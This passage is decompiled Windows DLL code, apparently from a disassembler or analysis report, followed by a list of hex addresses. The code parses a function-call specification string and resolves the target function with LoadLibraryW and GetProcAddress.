                                                                                                                            									__eflags = _t261 - 0x2a;
                                                                                                                            									if(_t261 == 0x2a) {
                                                                                                                            										_v36 = 2;
                                                                                                                            										L57:
                                                                                                                            										_t321 = _v12;
                                                                                                                            										_v28 = _v24;
                                                                                                                            										_t283 = 0;
                                                                                                                            										__eflags = 0;
                                                                                                                            										goto L58;
                                                                                                                            									}
                                                                                                                            									__eflags = _t261 - 0x2d;
                                                                                                                            									if(_t261 == 0x2d) {
                                                                                                                            										L151:
                                                                                                                            										_t304 =  *_t321;
                                                                                                                            										__eflags = _t304 - 0x2d;
                                                                                                                            										if(_t304 != 0x2d) {
                                                                                                                            											L154:
                                                                                                                            											_t264 =  &(_t321[1]);
                                                                                                                            											__eflags =  *_t264 - 0x3a;
                                                                                                                            											if( *_t264 != 0x3a) {
                                                                                                                            												goto L162;
                                                                                                                            											}
                                                                                                                            											__eflags = _t304 - 0x2d;
                                                                                                                            											if(_t304 == 0x2d) {
                                                                                                                            												goto L162;
                                                                                                                            											}
                                                                                                                            											_v36 = 1;
                                                                                                                            											L157:
                                                                                                                            											_v12 = _t264;
                                                                                                                            											__eflags = _v28 - _v24;
                                                                                                                            											if(_v28 <= _v24) {
                                                                                                                            												 *_v48 = _t283;
                                                                                                                            											} else {
                                                                                                                            												 *_v28 = _t283;
                                                                                                                            												lstrcpyW(_v48, _v24);
                                                                                                                            											}
                                                                                                                            											goto L57;
                                                                                                                            										}
                                                                                                                            										_t264 =  &(_t321[1]);
                                                                                                                            										__eflags =  *_t264 - 0x3e;
                                                                                                                            										if( *_t264 != 0x3e) {
                                                                                                                            											goto L154;
                                                                                                                            										}
                                                                                                                            										_v36 = 3;
                                                                                                                            										goto L157;
                                                                                                                            									}
                                                                                                                            									__eflags = _t261 - 0x3a;
                                                                                                                            									if(_t261 != 0x3a) {
                                                                                                                            										goto L162;
                                                                                                                            									}
                                                                                                                            									goto L151;
                                                                                                                            								}
                                                                                                                            								_t269 = _t260 - 1;
                                                                                                                            								__eflags = _t269;
                                                                                                                            								if(_t269 == 0) {
                                                                                                                            									L80:
                                                                                                                            									_t305 = _t286 + 0xffffffde;
                                                                                                                            									__eflags = _t305 - 0x55;
                                                                                                                            									if(_t305 > 0x55) {
                                                                                                                            										goto L57;
                                                                                                                            									}
                                                                                                                            									switch( *((intOrPtr*)(( *(_t305 + 0x70b523e8) & 0x000000ff) * 4 +  &M70B5235C))) {
                                                                                                                            										case 0:
                                                                                                                            											__ecx = _v24;
                                                                                                                            											__edi = _v12;
                                                                                                                            											while(1) {
                                                                                                                            												__edi = __edi + 1;
                                                                                                                            												__edi = __edi + 1;
                                                                                                                            												_v12 = __edi;
                                                                                                                            												__ax =  *__edi;
                                                                                                                            												__eflags = __ax - __dx;
                                                                                                                            												if(__ax != __dx) {
                                                                                                                            													goto L132;
                                                                                                                            												}
                                                                                                                            												L131:
                                                                                                                            												__eflags =  *((intOrPtr*)(__edi + 2)) - __dx;
                                                                                                                            												if( *((intOrPtr*)(__edi + 2)) != __dx) {
                                                                                                                            													L136:
                                                                                                                            													 *__ecx =  *__ecx & 0x00000000;
                                                                                                                            													__eax = E70B512CC(_v24);
                                                                                                                            													__ebx = __eax;
                                                                                                                            													goto L97;
                                                                                                                            												}
                                                                                                                            												L132:
                                                                                                                            												__eflags = __ax;
                                                                                                                            												if(__ax == 0) {
                                                                                                                            													goto L136;
                                                                                                                            												}
                                                                                                                            												__eflags = __ax - __dx;
                                                                                                                            												if(__ax == __dx) {
                                                                                                                            													__edi = __edi + 1;
                                                                                                                            													__edi = __edi + 1;
                                                                                                                            													__eflags = __edi;
                                                                                                                            												}
                                                                                                                            												__ax =  *__edi;
                                                                                                                            												 *__ecx =  *__edi;
                                                                                                                            												__ecx = __ecx + 1;
                                                                                                                            												__ecx = __ecx + 1;
                                                                                                                            												__edi = __edi + 1;
                                                                                                                            												__edi = __edi + 1;
                                                                                                                            												_v12 = __edi;
                                                                                                                            												__ax =  *__edi;
                                                                                                                            												__eflags = __ax - __dx;
                                                                                                                            												if(__ax != __dx) {
                                                                                                                            													goto L132;
                                                                                                                            												}
                                                                                                                            												goto L131;
                                                                                                                            											}
                                                                                                                            										case 1:
                                                                                                                            											_v8 = 1;
                                                                                                                            											goto L57;
                                                                                                                            										case 2:
                                                                                                                            											_v8 = _v8 | 0xffffffff;
                                                                                                                            											goto L57;
                                                                                                                            										case 3:
                                                                                                                            											_v8 = _v8 & 0x00000000;
                                                                                                                            											_v20 = _v20 & 0x00000000;
                                                                                                                            											_v16 = _v16 + 1;
                                                                                                                            											goto L85;
                                                                                                                            										case 4:
                                                                                                                            											__eflags = _v20;
                                                                                                                            											if(_v20 != 0) {
                                                                                                                            												goto L57;
                                                                                                                            											}
                                                                                                                            											_v12 = _v12 - 2;
                                                                                                                            											__ebx = E70B512BB();
                                                                                                                            											 &_v12 = E70B51B86( &_v12);
                                                                                                                            											__eax = E70B51510(__edx, __eax, __edx, __ebx);
                                                                                                                            											goto L97;
                                                                                                                            										case 5:
                                                                                                                            											L105:
                                                                                                                            											_v20 = _v20 + 1;
                                                                                                                            											goto L57;
                                                                                                                            										case 6:
                                                                                                                            											_push(7);
                                                                                                                            											goto L123;
                                                                                                                            										case 7:
                                                                                                                            											_push(0x19);
                                                                                                                            											goto L143;
                                                                                                                            										case 8:
                                                                                                                            											__eax = 0;
                                                                                                                            											__eax = 1;
                                                                                                                            											__eflags = 1;
                                                                                                                            											goto L107;
                                                                                                                            										case 9:
                                                                                                                            											_push(0x15);
                                                                                                                            											goto L143;
                                                                                                                            										case 0xa:
                                                                                                                            											_push(0x16);
                                                                                                                            											goto L143;
                                                                                                                            										case 0xb:
                                                                                                                            											_push(0x18);
                                                                                                                            											goto L143;
                                                                                                                            										case 0xc:
                                                                                                                            											__eax = 0;
                                                                                                                            											__eax = 1;
                                                                                                                            											__eflags = 1;
                                                                                                                            											goto L118;
                                                                                                                            										case 0xd:
                                                                                                                            											__eax = 0;
                                                                                                                            											__eax = 1;
                                                                                                                            											__eflags = 1;
                                                                                                                            											goto L109;
                                                                                                                            										case 0xe:
                                                                                                                            											__eax = 0;
                                                                                                                            											__eax = 1;
                                                                                                                            											__eflags = 1;
                                                                                                                            											goto L111;
                                                                                                                            										case 0xf:
                                                                                                                            											__eax = 0;
                                                                                                                            											__eax = 1;
                                                                                                                            											__eflags = 1;
                                                                                                                            											goto L122;
                                                                                                                            										case 0x10:
                                                                                                                            											__eax = 0;
                                                                                                                            											__eax = 1;
                                                                                                                            											__eflags = 1;
                                                                                                                            											goto L113;
                                                                                                                            										case 0x11:
                                                                                                                            											_push(3);
                                                                                                                            											goto L123;
                                                                                                                            										case 0x12:
                                                                                                                            											_push(0x17);
                                                                                                                            											L143:
                                                                                                                            											_pop(__ebx);
                                                                                                                            											goto L98;
                                                                                                                            										case 0x13:
                                                                                                                            											__eax =  &_v12;
                                                                                                                            											__eax = E70B51B86( &_v12);
                                                                                                                            											__ebx = __eax;
                                                                                                                            											__ebx = __eax + 1;
                                                                                                                            											__eflags = __ebx - 0xb;
                                                                                                                            											if(__ebx < 0xb) {
                                                                                                                            												__ebx = __ebx + 0xa;
                                                                                                                            											}
                                                                                                                            											goto L97;
                                                                                                                            										case 0x14:
                                                                                                                            											__ebx = 0xffffffff;
                                                                                                                            											goto L98;
                                                                                                                            										case 0x15:
                                                                                                                            											__eax = 0;
                                                                                                                            											__eax = 1;
                                                                                                                            											__eflags = 1;
                                                                                                                            											goto L116;
                                                                                                                            										case 0x16:
                                                                                                                            											__ecx = 0;
                                                                                                                            											__eflags = 0;
                                                                                                                            											goto L91;
                                                                                                                            										case 0x17:
                                                                                                                            											__eax = 0;
                                                                                                                            											__eax = 1;
                                                                                                                            											__eflags = 1;
                                                                                                                            											goto L120;
                                                                                                                            										case 0x18:
                                                                                                                            											_t271 =  *(_t332 + 0x1014);
                                                                                                                            											__eflags = _t271 - _v16;
                                                                                                                            											if(_t271 > _v16) {
                                                                                                                            												_v16 = _t271;
                                                                                                                            											}
                                                                                                                            											_v8 = _v8 & 0x00000000;
                                                                                                                            											_v20 = _v20 & 0x00000000;
                                                                                                                            											_v36 - 3 = _t271 - (_v36 == 3);
                                                                                                                            											if(_t271 != _v36 == 3) {
                                                                                                                            												L85:
                                                                                                                            												_v40 = 1;
                                                                                                                            											}
                                                                                                                            											goto L57;
                                                                                                                            										case 0x19:
                                                                                                                            											L107:
                                                                                                                            											__ecx = 0;
                                                                                                                            											_v8 = 2;
                                                                                                                            											__ecx = 1;
                                                                                                                            											goto L91;
                                                                                                                            										case 0x1a:
                                                                                                                            											L118:
                                                                                                                            											_push(5);
                                                                                                                            											goto L123;
                                                                                                                            										case 0x1b:
                                                                                                                            											L109:
                                                                                                                            											__ecx = 0;
                                                                                                                            											_v8 = 3;
                                                                                                                            											__ecx = 1;
                                                                                                                            											goto L91;
                                                                                                                            										case 0x1c:
                                                                                                                            											L111:
                                                                                                                            											__ecx = 0;
                                                                                                                            											__ecx = 1;
                                                                                                                            											goto L91;
                                                                                                                            										case 0x1d:
                                                                                                                            											L122:
                                                                                                                            											_push(6);
                                                                                                                            											goto L123;
                                                                                                                            										case 0x1e:
                                                                                                                            											L113:
                                                                                                                            											_push(2);
                                                                                                                            											goto L123;
                                                                                                                            										case 0x1f:
                                                                                                                            											__eax =  &_v12;
                                                                                                                            											__eax = E70B51B86( &_v12);
                                                                                                                            											__ebx = __eax;
                                                                                                                            											__ebx = __eax + 1;
                                                                                                                            											goto L97;
                                                                                                                            										case 0x20:
                                                                                                                            											L116:
                                                                                                                            											_v52 = _v52 + 1;
                                                                                                                            											_push(4);
                                                                                                                            											_pop(__ecx);
                                                                                                                            											goto L91;
                                                                                                                            										case 0x21:
                                                                                                                            											L120:
                                                                                                                            											_push(4);
                                                                                                                            											L123:
                                                                                                                            											_pop(__ecx);
                                                                                                                            											L91:
                                                                                                                            											__edi = _v16;
                                                                                                                            											__edx =  *(0x70b5405c + __ecx * 4);
                                                                                                                            											__eax =  ~__eax;
                                                                                                                            											asm("sbb eax, eax");
                                                                                                                            											_v40 = 1;
                                                                                                                            											__edi = _v16 << 5;
                                                                                                                            											__eax = __eax & 0x00008000;
                                                                                                                            											__edi = (_v16 << 5) + __esi;
                                                                                                                            											__eax = __eax | __ecx;
                                                                                                                            											__eflags = _v8;
                                                                                                                            											 *(__edi + 0x1018) = __eax;
                                                                                                                            											if(_v8 < 0) {
                                                                                                                            												L93:
                                                                                                                            												__edx = 0;
                                                                                                                            												__edx = 1;
                                                                                                                            												__eflags = 1;
                                                                                                                            												L94:
                                                                                                                            												__eflags = _v8 - 1;
                                                                                                                            												 *(__edi + 0x1028) = __edx;
                                                                                                                            												if(_v8 == 1) {
                                                                                                                            													__eax =  &_v12;
                                                                                                                            													__eax = E70B51B86( &_v12);
                                                                                                                            													__eax = __eax + 1;
                                                                                                                            													__eflags = __eax;
                                                                                                                            													_v8 = __eax;
                                                                                                                            												}
                                                                                                                            												__eax = _v8;
                                                                                                                            												 *((intOrPtr*)(__edi + 0x101c)) = _v8;
                                                                                                                            												_t136 = _v16 + 0x81; // 0x81
                                                                                                                            												_t136 = _t136 << 5;
                                                                                                                            												__eax = 0;
                                                                                                                            												__eflags = 0;
                                                                                                                            												 *((intOrPtr*)((_t136 << 5) + __esi)) = 0;
                                                                                                                            												 *((intOrPtr*)(__edi + 0x1030)) = 0;
                                                                                                                            												 *((intOrPtr*)(__edi + 0x102c)) = 0;
                                                                                                                            												L97:
                                                                                                                            												__eflags = __ebx;
                                                                                                                            												if(__ebx == 0) {
                                                                                                                            													goto L57;
                                                                                                                            												}
                                                                                                                            												L98:
                                                                                                                            												__eflags = _v20;
                                                                                                                            												_v40 = 1;
                                                                                                                            												if(_v20 != 0) {
                                                                                                                            													L103:
                                                                                                                            													__eflags = _v20 - 1;
                                                                                                                            													if(_v20 == 1) {
                                                                                                                            														__eax = _v16;
                                                                                                                            														__eax = _v16 << 5;
                                                                                                                            														__eflags = __eax;
                                                                                                                            														 *(__eax + __esi + 0x102c) = __ebx;
                                                                                                                            													}
                                                                                                                            													goto L105;
                                                                                                                            												}
                                                                                                                            												_v16 = _v16 << 5;
                                                                                                                            												_t144 = __esi + 0x1030; // 0x1030
                                                                                                                            												__edi = (_v16 << 5) + _t144;
                                                                                                                            												__eax =  *__edi;
                                                                                                                            												__eflags = __eax - 0xffffffff;
                                                                                                                            												if(__eax <= 0xffffffff) {
                                                                                                                            													L101:
                                                                                                                            													__eax = GlobalFree(__eax);
                                                                                                                            													L102:
                                                                                                                            													 *__edi = __ebx;
                                                                                                                            													goto L103;
                                                                                                                            												}
                                                                                                                            												__eflags = __eax - 0x19;
                                                                                                                            												if(__eax <= 0x19) {
                                                                                                                            													goto L102;
                                                                                                                            												}
                                                                                                                            												goto L101;
                                                                                                                            											}
                                                                                                                            											__eflags = __edx;
                                                                                                                            											if(__edx > 0) {
                                                                                                                            												goto L94;
                                                                                                                            											}
                                                                                                                            											goto L93;
                                                                                                                            										case 0x22:
                                                                                                                            											goto L57;
                                                                                                                            									}
                                                                                                                            								}
                                                                                                                            								_t272 = _t269 - 1;
                                                                                                                            								__eflags = _t272;
                                                                                                                            								if(_t272 == 0) {
                                                                                                                            									_v16 = _t283;
                                                                                                                            									goto L80;
                                                                                                                            								}
                                                                                                                            								__eflags = _t272 != 1;
                                                                                                                            								if(_t272 != 1) {
                                                                                                                            									goto L162;
                                                                                                                            								}
                                                                                                                            								__eflags = _t286 - 0x6e;
                                                                                                                            								if(__eflags > 0) {
                                                                                                                            									_t309 = _t286 - 0x72;
                                                                                                                            									__eflags = _t309;
                                                                                                                            									if(_t309 == 0) {
                                                                                                                            										_push(4);
                                                                                                                            										L74:
                                                                                                                            										_pop(_t274);
                                                                                                                            										L75:
                                                                                                                            										__eflags = _v8 - 1;
                                                                                                                            										if(_v8 != 1) {
                                                                                                                            											_t96 = _t332 + 0x1010;
                                                                                                                            											 *_t96 =  *(_t332 + 0x1010) &  !_t274;
                                                                                                                            											__eflags =  *_t96;
                                                                                                                            										} else {
                                                                                                                            											 *(_t332 + 0x1010) =  *(_t332 + 0x1010) | _t274;
                                                                                                                            										}
                                                                                                                            										_v8 = 1;
                                                                                                                            										goto L57;
                                                                                                                            									}
                                                                                                                            									_t312 = _t309 - 1;
                                                                                                                            									__eflags = _t312;
                                                                                                                            									if(_t312 == 0) {
                                                                                                                            										_push(0x10);
                                                                                                                            										goto L74;
                                                                                                                            									}
                                                                                                                            									__eflags = _t312 != 0;
                                                                                                                            									if(_t312 != 0) {
                                                                                                                            										goto L57;
                                                                                                                            									}
                                                                                                                            									_push(0x40);
                                                                                                                            									goto L74;
                                                                                                                            								}
                                                                                                                            								if(__eflags == 0) {
                                                                                                                            									_push(8);
                                                                                                                            									goto L74;
                                                                                                                            								}
                                                                                                                            								_t315 = _t286 - 0x21;
                                                                                                                            								__eflags = _t315;
                                                                                                                            								if(_t315 == 0) {
                                                                                                                            									_v8 =  ~_v8;
                                                                                                                            									goto L57;
                                                                                                                            								}
                                                                                                                            								_t316 = _t315 - 0x11;
                                                                                                                            								__eflags = _t316;
                                                                                                                            								if(_t316 == 0) {
                                                                                                                            									_t274 = 0x100;
                                                                                                                            									goto L75;
                                                                                                                            								}
                                                                                                                            								_t317 = _t316 - 0x31;
                                                                                                                            								__eflags = _t317;
                                                                                                                            								if(_t317 == 0) {
                                                                                                                            									_t274 = 1;
                                                                                                                            									goto L75;
                                                                                                                            								}
                                                                                                                            								__eflags = _t317 != 0;
                                                                                                                            								if(_t317 != 0) {
                                                                                                                            									goto L57;
                                                                                                                            								}
                                                                                                                            								_push(0x20);
                                                                                                                            								goto L74;
                                                                                                                            							} else {
                                                                                                                            								_v32 = _t283;
                                                                                                                            								_v36 = _t283;
                                                                                                                            								goto L20;
                                                                                                                            							}
                                                                                                                            						}
                                                                                                                            						__eflags =  *((short*)(_t321 - 2)) - 0x3a;
                                                                                                                            						if( *((short*)(_t321 - 2)) != 0x3a) {
                                                                                                                            							goto L17;
                                                                                                                            						}
                                                                                                                            						__eflags = _v32 - _t283;
                                                                                                                            						if(_v32 == _t283) {
                                                                                                                            							goto L43;
                                                                                                                            						}
                                                                                                                            						goto L17;
                                                                                                                            					}
                                                                                                                            					_t277 = _t258 - 5;
                                                                                                                            					if(_t277 == 0) {
                                                                                                                            						__eflags = _v44 - _t283;
                                                                                                                            						if(_v44 != _t283) {
                                                                                                                            							goto L43;
                                                                                                                            						} else {
                                                                                                                            							__eflags = _v36 - 3;
                                                                                                                            							_v32 = 1;
                                                                                                                            							_v8 = _t283;
                                                                                                                            							_v20 = _t283;
                                                                                                                            							_v16 = (0 | _v36 == 0x00000003) + 1;
                                                                                                                            							_v40 = _t283;
                                                                                                                            							goto L20;
                                                                                                                            						}
                                                                                                                            					}
                                                                                                                            					_t281 = _t277 - 1;
                                                                                                                            					if(_t281 == 0) {
                                                                                                                            						__eflags = _v44 - _t283;
                                                                                                                            						if(_v44 != _t283) {
                                                                                                                            							goto L43;
                                                                                                                            						} else {
                                                                                                                            							_v32 = 2;
                                                                                                                            							_v8 = _t283;
                                                                                                                            							_v20 = _t283;
                                                                                                                            							goto L20;
                                                                                                                            						}
                                                                                                                            					}
                                                                                                                            					if(_t281 != 0x16) {
                                                                                                                            						goto L43;
                                                                                                                            					} else {
                                                                                                                            						_v32 = 3;
                                                                                                                            						_v8 = 1;
                                                                                                                            						goto L20;
                                                                                                                            					}
                                                                                                                            				}
                                                                                                                            				GlobalFree(_v56);
                                                                                                                            				GlobalFree(_v24);
                                                                                                                            				GlobalFree(_v48);
                                                                                                                            				if(_t332 == _t283 ||  *(_t332 + 0x100c) != _t283) {
                                                                                                                            					L182:
                                                                                                                            					return _t332;
                                                                                                                            				} else {
                                                                                                                            					_t225 =  *_t332 - 1;
                                                                                                                            					if(_t225 == 0) {
                                                                                                                            						_t187 = _t332 + 8; // 0x8
                                                                                                                            						_t324 = _t187;
                                                                                                                            						__eflags =  *_t324 - _t283;
                                                                                                                            						if( *_t324 != _t283) {
                                                                                                                            							_t226 = GetModuleHandleW(_t324);
                                                                                                                            							__eflags = _t226 - _t283;
                                                                                                                            							 *(_t332 + 0x1008) = _t226;
                                                                                                                            							if(_t226 != _t283) {
                                                                                                                            								L171:
                                                                                                                            								_t192 = _t332 + 0x808; // 0x808
                                                                                                                            								_t325 = _t192;
                                                                                                                            								_t227 = E70B516BD( *(_t332 + 0x1008), _t325);
                                                                                                                            								__eflags = _t227 - _t283;
                                                                                                                            								 *(_t332 + 0x100c) = _t227;
                                                                                                                            								if(_t227 == _t283) {
                                                                                                                            									__eflags =  *_t325 - 0x23;
                                                                                                                            									if( *_t325 == 0x23) {
                                                                                                                            										_t195 = _t332 + 0x80a; // 0x80a
                                                                                                                            										_t231 = E70B513B1(_t195);
                                                                                                                            										__eflags = _t231 - _t283;
                                                                                                                            										if(_t231 != _t283) {
                                                                                                                            											__eflags = _t231 & 0xffff0000;
                                                                                                                            											if((_t231 & 0xffff0000) == 0) {
                                                                                                                            												 *(_t332 + 0x100c) = GetProcAddress( *(_t332 + 0x1008), _t231 & 0x0000ffff);
                                                                                                                            											}
                                                                                                                            										}
                                                                                                                            									}
                                                                                                                            								}
                                                                                                                            								__eflags = _v52 - _t283;
                                                                                                                            								if(_v52 != _t283) {
                                                                                                                            									L178:
                                                                                                                            									_t325[lstrlenW(_t325)] = 0x57;
                                                                                                                            									_t229 = E70B516BD( *(_t332 + 0x1008), _t325);
                                                                                                                            									__eflags = _t229 - _t283;
                                                                                                                            									if(_t229 != _t283) {
                                                                                                                            										L166:
                                                                                                                            										 *(_t332 + 0x100c) = _t229;
                                                                                                                            										goto L182;
                                                                                                                            									}
                                                                                                                            									__eflags =  *(_t332 + 0x100c) - _t283;
                                                                                                                            									L180:
                                                                                                                            									if(__eflags != 0) {
                                                                                                                            										goto L182;
                                                                                                                            									}
                                                                                                                            									L181:
                                                                                                                            									_t206 = _t332 + 4;
                                                                                                                            									 *_t206 =  *(_t332 + 4) | 0xffffffff;
                                                                                                                            									__eflags =  *_t206;
                                                                                                                            									goto L182;
                                                                                                                            								} else {
                                                                                                                            									__eflags =  *(_t332 + 0x100c) - _t283;
                                                                                                                            									if( *(_t332 + 0x100c) != _t283) {
                                                                                                                            										goto L182;
                                                                                                                            									}
                                                                                                                            									goto L178;
                                                                                                                            								}
                                                                                                                            							}
                                                                                                                            							_t234 = LoadLibraryW(_t324);
                                                                                                                            							__eflags = _t234 - _t283;
                                                                                                                            							 *(_t332 + 0x1008) = _t234;
                                                                                                                            							if(_t234 == _t283) {
                                                                                                                            								goto L181;
                                                                                                                            							}
                                                                                                                            							goto L171;
                                                                                                                            						}
                                                                                                                            						_t188 = _t332 + 0x808; // 0x808
                                                                                                                            						_t236 = E70B513B1(_t188);
                                                                                                                            						 *(_t332 + 0x100c) = _t236;
                                                                                                                            						__eflags = _t236 - _t283;
                                                                                                                            						goto L180;
                                                                                                                            					}
                                                                                                                            					_t237 = _t225 - 1;
                                                                                                                            					if(_t237 == 0) {
                                                                                                                            						_t185 = _t332 + 0x808; // 0x808
                                                                                                                            						_t238 = _t185;
                                                                                                                            						__eflags =  *_t238 - _t283;
                                                                                                                            						if( *_t238 == _t283) {
                                                                                                                            							goto L182;
                                                                                                                            						}
                                                                                                                            						_t229 = E70B513B1(_t238);
                                                                                                                            						L165:
                                                                                                                            						goto L166;
                                                                                                                            					}
                                                                                                                            					if(_t237 != 1) {
                                                                                                                            						goto L182;
                                                                                                                            					}
                                                                                                                            					_t81 = _t332 + 8; // 0x8
                                                                                                                            					_t284 = _t81;
                                                                                                                            					_t326 = E70B513B1(_t81);
                                                                                                                            					 *(_t332 + 0x1008) = _t326;
                                                                                                                            					if(_t326 == 0) {
                                                                                                                            						goto L181;
                                                                                                                            					}
                                                                                                                            					 *(_t332 + 0x104c) =  *(_t332 + 0x104c) & 0x00000000;
                                                                                                                            					 *((intOrPtr*)(_t332 + 0x1050)) = E70B512CC(_t284);
                                                                                                                            					 *(_t332 + 0x103c) =  *(_t332 + 0x103c) & 0x00000000;
                                                                                                                            					 *((intOrPtr*)(_t332 + 0x1048)) = 1;
                                                                                                                            					 *((intOrPtr*)(_t332 + 0x1038)) = 1;
                                                                                                                            					_t90 = _t332 + 0x808; // 0x808
                                                                                                                            					_t229 =  *(_t326->i + E70B513B1(_t90) * 4);
                                                                                                                            					goto L165;
                                                                                                                            				}
                                                                                                                            			}


































































                                                                                                                            0x70b51c07
                                                                                                                            0x70b51c0a
                                                                                                                            0x70b51c0d
                                                                                                                            0x70b51c10
                                                                                                                            0x70b51c13
                                                                                                                            0x70b51c16
                                                                                                                            0x70b51c19
                                                                                                                            0x70b51c1b
                                                                                                                            0x70b51c1e
                                                                                                                            0x70b51c21
                                                                                                                            0x70b51c26
                                                                                                                            0x70b51c29
                                                                                                                            0x70b51c31
                                                                                                                            0x70b51c39
                                                                                                                            0x70b51c3b
                                                                                                                            0x70b51c3e
                                                                                                                            0x70b51c46
                                                                                                                            0x70b51c46
                                                                                                                            0x70b51c4b
                                                                                                                            0x70b51c4e
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x70b51c5b
                                                                                                                            0x70b51c60
                                                                                                                            0x70b51c62
                                                                                                                            0x70b51cf4
                                                                                                                            0x70b51cf4
                                                                                                                            0x70b51cf4
                                                                                                                            0x70b51cf8
                                                                                                                            0x70b51cfb
                                                                                                                            0x70b51cfd
                                                                                                                            0x70b51d1f
                                                                                                                            0x70b51d21
                                                                                                                            0x70b51d24
                                                                                                                            0x70b51d2d
                                                                                                                            0x70b51d33
                                                                                                                            0x70b51d35
                                                                                                                            0x70b51d3b
                                                                                                                            0x70b51d3b
                                                                                                                            0x70b51d41
                                                                                                                            0x70b51d44
                                                                                                                            0x70b51d44
                                                                                                                            0x70b51d47
                                                                                                                            0x70b51d47
                                                                                                                            0x70b51d4d
                                                                                                                            0x70b51d4f
                                                                                                                            0x70b51d4f
                                                                                                                            0x70b51d51
                                                                                                                            0x70b51d54
                                                                                                                            0x70b51d57
                                                                                                                            0x70b51d5d
                                                                                                                            0x70b51d63
                                                                                                                            0x70b51d66
                                                                                                                            0x70b51d8a
                                                                                                                            0x70b51d8d
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x70b51d90
                                                                                                                            0x70b51d92
                                                                                                                            0x70b51da0
                                                                                                                            0x70b51da3
                                                                                                                            0x70b51da5
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x70b51da7
                                                                                                                            0x70b51da7
                                                                                                                            0x70b51da7
                                                                                                                            0x70b51dad
                                                                                                                            0x70b51daf
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x70b51db1
                                                                                                                            0x70b51db3
                                                                                                                            0x70b51db5
                                                                                                                            0x70b51db7
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x70b51db7
                                                                                                                            0x70b51db9
                                                                                                                            0x70b51dbb
                                                                                                                            0x70b51dbd
                                                                                                                            0x70b51dbd
                                                                                                                            0x70b51dc3
                                                                                                                            0x70b51dc9
                                                                                                                            0x70b51dcb
                                                                                                                            0x70b51ddf
                                                                                                                            0x70b51ddf
                                                                                                                            0x70b51de1
                                                                                                                            0x70b51dcd
                                                                                                                            0x70b51dd3
                                                                                                                            0x70b51dd6
                                                                                                                            0x70b51dd6
                                                                                                                            0x00000000
                                                                                                                            0x70b51d68
                                                                                                                            0x70b51d68
                                                                                                                            0x70b51d68
                                                                                                                            0x70b51d69
                                                                                                                            0x70b51d71
                                                                                                                            0x70b51d75
                                                                                                                            0x70b51d7b
                                                                                                                            0x70b51d7f
                                                                                                                            0x00000000
                                                                                                                            0x70b51d7f
                                                                                                                            0x70b51d6b
                                                                                                                            0x70b51d6b
                                                                                                                            0x70b51d6c
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x70b51d6e
                                                                                                                            0x70b51d6f
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x70b51d6f
                                                                                                                            0x70b51cff
                                                                                                                            0x70b51d00
                                                                                                                            0x70b51d09
                                                                                                                            0x70b51d0c
                                                                                                                            0x70b51d19
                                                                                                                            0x70b51d19
                                                                                                                            0x70b51d0e
                                                                                                                            0x70b51d0e
                                                                                                                            0x70b51de7
                                                                                                                            0x70b51dea
                                                                                                                            0x70b51dee
                                                                                                                            0x70b51e61
                                                                                                                            0x70b51e65
                                                                                                                            0x70b51c43
                                                                                                                            0x00000000
                                                                                                                            0x70b51c43
                                                                                                                            0x00000000
                                                                                                                            0x70b51e65
                                                                                                                            0x70b51cfd
                                                                                                                            0x70b51c68
                                                                                                                            0x70b51c6b
                                                                                                                            0x70b51cce
                                                                                                                            0x70b51cd1
                                                                                                                            0x70b51ce3
                                                                                                                            0x70b51ce3
                                                                                                                            0x70b51ce6
                                                                                                                            0x70b51df3
                                                                                                                            0x70b51df6
                                                                                                                            0x70b51df6
                                                                                                                            0x70b51df8
                                                                                                                            0x70b521ae
                                                                                                                            0x70b521c6
                                                                                                                            0x70b521c6
                                                                                                                            0x70b521c9
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x70b521b3
                                                                                                                            0x70b521b4
                                                                                                                            0x70b521b7
                                                                                                                            0x70b521ba
                                                                                                                            0x70b52244
                                                                                                                            0x70b5224b
                                                                                                                            0x70b52251
                                                                                                                            0x70b52255
                                                                                                                            0x70b51e5c
                                                                                                                            0x70b51e5d
                                                                                                                            0x70b51e5d
                                                                                                                            0x70b51e5e
                                                                                                                            0x00000000
                                                                                                                            0x70b51e5e
                                                                                                                            0x70b521c0
                                                                                                                            0x70b521c3
                                                                                                                            0x70b521c3
                                                                                                                            0x70b521cb
                                                                                                                            0x70b521ce
                                                                                                                            0x70b52238
                                                                                                                            0x70b51e51
                                                                                                                            0x70b51e54
                                                                                                                            0x70b51e57
                                                                                                                            0x70b51e5a
                                                                                                                            0x70b51e5a
                                                                                                                            0x00000000
                                                                                                                            0x70b51e5a
                                                                                                                            0x70b521d0
                                                                                                                            0x70b521d3
                                                                                                                            0x70b521da
                                                                                                                            0x70b521da
                                                                                                                            0x70b521dd
                                                                                                                            0x70b521e1
                                                                                                                            0x70b521f5
                                                                                                                            0x70b521f5
                                                                                                                            0x70b521f8
                                                                                                                            0x70b521fc
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x70b521fe
                                                                                                                            0x70b52202
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x70b52204
                                                                                                                            0x70b5220b
                                                                                                                            0x70b5220b
                                                                                                                            0x70b52211
                                                                                                                            0x70b52214
                                                                                                                            0x70b52230
                                                                                                                            0x70b52216
                                                                                                                            0x70b5221f
                                                                                                                            0x70b52222
                                                                                                                            0x70b52222
                                                                                                                            0x00000000
                                                                                                                            0x70b52214
                                                                                                                            0x70b521e3
                                                                                                                            0x70b521e6
                                                                                                                            0x70b521ea
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x70b521ec
                                                                                                                            0x00000000
                                                                                                                            0x70b521ec
                                                                                                                            0x70b521d5
                                                                                                                            0x70b521d8
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x70b521d8
                                                                                                                            0x70b51dfe
                                                                                                                            0x70b51dfe
                                                                                                                            0x70b51dff
                                                                                                                            0x70b51f49
                                                                                                                            0x70b51f49
                                                                                                                            0x70b51f50
                                                                                                                            0x70b51f53
                                                                                                                            0x00000000
